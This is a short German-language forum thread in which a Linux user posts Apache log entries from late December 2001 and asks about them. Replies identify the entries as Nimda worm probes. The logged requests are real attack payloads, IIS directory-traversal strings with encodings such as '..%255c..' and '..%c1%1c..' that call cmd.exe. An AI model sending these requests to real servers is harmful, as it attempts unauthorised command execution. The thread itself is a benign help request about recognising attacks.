Hi,

Ich hab mir gerade mal die access_log vom apache angeschaut.
Seit ca. 2-3 Tagen habe ich solche Eintraege (die IP aendert sich, laut nslookup waren es bis jetzt immer T-Online-Dialin-Zugaenge)

207.82.205.151 - - [26/Dec/2001:07:57:17 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404
220
207.82.205.151 - - [26/Dec/2001:07:57:18 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 22
0
207.82.205.151 - - [26/Dec/2001:07:57:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1
.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:19 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1
.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:19 +0100] "GET /scripts/..%255c../winnt/system32/cmd.e
xe?/c+dir HTTP/1.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:20 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:20 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c
1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 220
207.82.205.151 - - [26/Dec/2001:07:57:21 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.
exe?/c+dir HTTP/1.0" 404 220

Sind das normale Eintraege oder was ist das ? Weil wenn ich, bzw jemand von dem ich es weiss auf meinen Server zugreift sehen die Eintraege anders aus

mfg
neobytes

Ist der Nimda-Wurm Virus, aber keine Angst der kann dir nichts anhaben.

Original geschrieben von geronet
Ist der Nimda-Wurm Virus, aber keine Angst der kann dir nichts anhaben.

Was für ein Glück, das Linux durchdacht ist :) Im gegensatz zu Windo~1 *gg